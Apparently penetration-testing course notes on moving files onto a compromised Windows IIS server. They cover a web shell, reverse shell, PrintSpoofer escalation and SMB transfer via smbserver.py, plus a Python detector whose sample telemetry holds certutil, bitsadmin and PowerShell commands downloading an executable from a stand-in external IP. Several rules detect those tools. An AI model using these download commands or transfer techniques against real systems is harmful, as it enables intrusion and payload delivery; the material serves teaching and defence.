# File Transfers

This scenario is a perfect example of how important it is for penetration testers and red teamers to understand **multiple file transfer methods**, and more importantly, how to **adapt** when common techniques are blocked.

Here’s a breakdown and summary of the key lessons and techniques highlighted in this scenario:

***

#### ⚙️ **Scenario Summary: File Transfer Challenges in a Hardened Environment**

**Initial Access:**

* Gained **Remote Code Execution (RCE)** on an IIS web server via **unrestricted file upload**.
* Uploaded a **web shell** to get a **reverse shell** for further enumeration.

**Privilege Escalation Attempt:**

* Attempted to use **PowerUp.ps1** via **PowerShell** ➡️ **Blocked** by **App Control Policy**.
* Discovered **SeImpersonatePrivilege** manually.
* Chose **PrintSpoofer** binary to escalate privileges.

**File Transfer Hurdles:**

| Method Attempted                       | Result    | Reason for Failure            |
| -------------------------------------- | --------- | ----------------------------- |
| **PowerShell**                         | ❌ Blocked | App Control Policy            |
| **Certutil from GitHub**               | ❌ Blocked | Web content filtering         |
| **FTP (port 21)**                      | ❌ Blocked | Firewall blocked outbound FTP |
| **SMB (TCP 445) using `smbserver.py`** | ✅ Success | SMB allowed outbound          |

***

#### 🧠 **Key Takeaways**

1. **Adaptability Is Critical:**
   * You must pivot quickly to alternative transfer methods when blocked.
2. **Common File Transfer Methods (Windows):**

| Method                                               | Protocol/Tool    | Notes                                            |
| ---------------------------------------------------- | ---------------- | ------------------------------------------------ |
| `PowerShell Invoke-WebRequest` / `Invoke-Expression` | HTTP             | Powerful but often monitored                     |
| `Certutil`                                           | HTTP             | Common fallback, but may be disabled or filtered |
| `bitsadmin`                                          | HTTP             | Deprecated, but can be useful                    |
| Windows FTP Client                                   | FTP              | Needs port 21 open                               |
| `smbserver.py` (Impacket)                            | SMB              | ✅ Often succeeds if port 445 is open             |
| Encoding (Base64 / Hex)                              | Clipboard / Echo | Good in restricted shells                        |
| DNS Tunneling                                        | DNS              | Rare but stealthy                                |
| Wget / Curl (Linux)                                  | HTTP/HTTPS       | May be blocked by firewall or proxy              |
| Email / Cloud Upload                                 | SMTP/HTTPS       | Often blocked by DLP solutions                   |

3. **Network Awareness:**
   * Firewalls, proxies, IDS/IPS, and web filters can all block or alert on your transfer attempts.
   * Outbound restrictions are common but rarely uniform: HTTP and FTP were filtered here, yet the target could still open an outbound **SMB (TCP 445)** connection and pull the file, so test each protocol rather than assuming all egress is closed.
4. **Tools to Know:**
   * [`smbserver.py`](https://github.com/SecureAuthCorp/impacket) (Impacket) – set up quick SMB shares
   * [`SimpleHTTPServer`](https://docs.python.org/3/library/http.server.html) / `http.server` (Python) – easy local file hosting (`python3 -m http.server` in Python 3)
   * `ncat`, `scp`, `curl`, `wget`, `socat` – all offer unique file transfer opportunities
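
The "Network Awareness" point and the "think like a defender" question at the end of these notes both come down to the same thing: every row in the methods table leaves a trace. The block below is an added example, not part of the module or its tooling: a handful of detection rules run over constructed telemetry (process-creation events with Sysmon/EDR-style fields, plus outbound firewall records). Host names, user names, IP addresses (taken from the documentation ranges) and the field layout are all assumptions; only the tools and ports come from the table above.

```python
import ipaddress
import re

# Constructed sample telemetry (not real logs). Process-creation events carry the
# fields an EDR/Sysmon event would; firewall events are outbound connection records.
PROCESS_EVENTS = [
    {"host": "WEB01", "user": "IIS APPPOOL\\DefaultAppPool",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/p.exe p.exe"},
    {"host": "WEB01", "user": "IIS APPPOOL\\DefaultAppPool",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job http://198.51.100.7/p.exe C:\\Temp\\p.exe"},
    {"host": "WEB01", "user": "IIS APPPOOL\\DefaultAppPool",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Invoke-WebRequest http://198.51.100.7/p.exe -OutFile p.exe"},
    # Legitimate certutil use: queries the local cert store, no URL, must NOT alert.
    {"host": "WS07", "user": "CORP\\alice",
     "image": r"C:\Windows\System32\certutil.exe", "cmdline": "certutil -store My"},
    {"host": "WS07", "user": "CORP\\alice",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

FIREWALL_EVENTS = [
    {"host": "WEB01", "dst_ip": "198.51.100.7", "dst_port": 445, "action": "allow"},
    {"host": "WEB01", "dst_ip": "198.51.100.7", "dst_port": 21,  "action": "deny"},
    {"host": "WS07",  "dst_ip": "10.0.0.5",     "dst_port": 445, "action": "allow"},  # internal file server
    {"host": "WS07",  "dst_ip": "203.0.113.10", "dst_port": 443, "action": "allow"},  # ordinary HTTPS
]

# A download needs a URL or a transfer verb on the command line; requiring one keeps
# day-to-day use of the same binaries (certutil -store, bitsadmin /list) quiet.
URL_RE = r"\b(?:https?|ftp)://"
PROCESS_RULES = [
    ("certutil_download", r"certutil\.exe$", r"-urlcache|" + URL_RE),
    ("bitsadmin_transfer", r"bitsadmin\.exe$", r"/transfer|" + URL_RE),
    ("powershell_web_download", r"powershell\.exe$",
     r"Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b"),
]

INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
WATCHED_PORTS = {21: "ftp", 445: "smb"}   # protocols that should never leave the network


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def detect_process_events(events) -> list[tuple[str, str]]:
    """Return (host, rule_name) for each event whose image and command line match a rule."""
    alerts = []
    for ev in events:
        for name, image_re, cmd_re in PROCESS_RULES:
            if (re.search(image_re, ev["image"], re.IGNORECASE)
                    and re.search(cmd_re, ev["cmdline"], re.IGNORECASE)):
                alerts.append((ev["host"], name))
    return alerts


def detect_firewall_events(events) -> list[tuple[str, str]]:
    """Flag SMB/FTP to non-internal addresses. A denied attempt is still worth an
    alert: the block worked, but something on the host tried to get out."""
    alerts = []
    for ev in events:
        proto = WATCHED_PORTS.get(ev["dst_port"])
        if proto is None or is_internal(ev["dst_ip"]):
            continue  # internal SMB/FTP is normal; any other port is out of scope here
        state = "allowed" if ev["action"] == "allow" else "blocked"
        alerts.append((ev["host"], f"external_{proto}_{state}"))
    return alerts


if __name__ == "__main__":
    for host, rule in detect_process_events(PROCESS_EVENTS) + detect_firewall_events(FIREWALL_EVENTS):
        print(f"{host}: {rule}")
```

Run against the constructed data, the three download attempts from the IIS app-pool account fire, the analyst's `certutil -store` does not, and the firewall side shows the gap that mattered in the scenario: outbound SMB to an external address was *allowed*. The `external_smb_allowed` alert is the one a defender would turn into an egress-filter rule; the `external_ftp_blocked` alert is the early warning that the block is being probed.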

***

#### 📌 **Practical Tip: Use a File Transfer Checklist**

Whenever you're stuck on a target:

1. Can I use PowerShell?
2. Is `certutil` available?
3. Are outbound ports like 80, 443, or 445 open?
4. Can I set up an SMB share with `smbserver.py`?
5. Can I encode a small binary as Base64 and reconstruct it?
6. Are there any mapped drives or local tools I can abuse?
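
Checklist item 5 deserves one concrete check that the module's summary leaves implicit: after a file is moved as Base64 text, how do you know the bytes that arrived are the bytes you sent? The block below is an added example, not code from the module: it encodes data as fixed-width Base64 lines alongside a SHA-256 digest of the original, then reconstructs and verifies it, so a lost or mangled line is reported instead of producing a silently corrupt file. The sample bytes are constructed; the helper names are my own.

```python
import base64
import binascii
import hashlib
import textwrap

# Constructed sample "binary": every byte value 0x00-0xFF, repeated to 1024 bytes,
# so the whole byte range passes through the encoding. Not a real program.
SAMPLE_FILE = bytes(range(256)) * 4


def encode_for_transfer(data: bytes, line_width: int = 76) -> tuple[list[str], str]:
    """Base64-encode data as fixed-width lines and return them together with the
    SHA-256 of the ORIGINAL bytes. The digest travels with the lines and is checked
    on the far side; fixed-width lines also make a truncated paste obvious by eye."""
    digest = hashlib.sha256(data).hexdigest()
    b64 = base64.b64encode(data).decode("ascii")
    return textwrap.wrap(b64, line_width), digest


def reconstruct(lines: list[str], expected_sha256: str) -> bytes:
    """Join the received lines, decode, and verify the digest.
    Raises ValueError on either kind of corruption: characters that are not Base64
    at all, or a clean decode that yields the wrong bytes (e.g. a whole line lost)."""
    joined = "".join(line.strip() for line in lines)
    try:
        data = base64.b64decode(joined, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"base64 decode failed: {exc}") from exc
    actual = hashlib.sha256(data).hexdigest()
    if actual != expected_sha256:
        raise ValueError(f"integrity check failed: expected {expected_sha256}, got {actual}")
    return data


def drop_line(lines: list[str], index: int) -> list[str]:
    """Simulate a line lost in transit (a terminal that swallowed part of a paste)."""
    return lines[:index] + lines[index + 1:]


if __name__ == "__main__":
    lines, digest = encode_for_transfer(SAMPLE_FILE)
    print(f"{len(lines)} lines of base64, sha256={digest}")
    assert reconstruct(lines, digest) == SAMPLE_FILE
    try:
        reconstruct(drop_line(lines, 5), digest)
    except ValueError as err:
        print("corruption detected:", err)
```

Note that dropping a 76-character line still leaves a string whose length is a multiple of four, so the decoder accepts it happily; only the digest comparison catches it. That is also why the checklist says *small* binary: `cmd.exe` caps a command line at 8191 characters, so anything larger arrives as many separate lines, and each one is a chance to lose data that the hash check is there to catch.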

***

#### 🎯 **Final Thoughts**

* **File transfer is a foundational red team skill.** This module trains you to think like an attacker in a **constrained environment**.
* Always have **multiple options ready**.
* Think like a **defender** too: if you were defending this system, how would you stop these transfers?

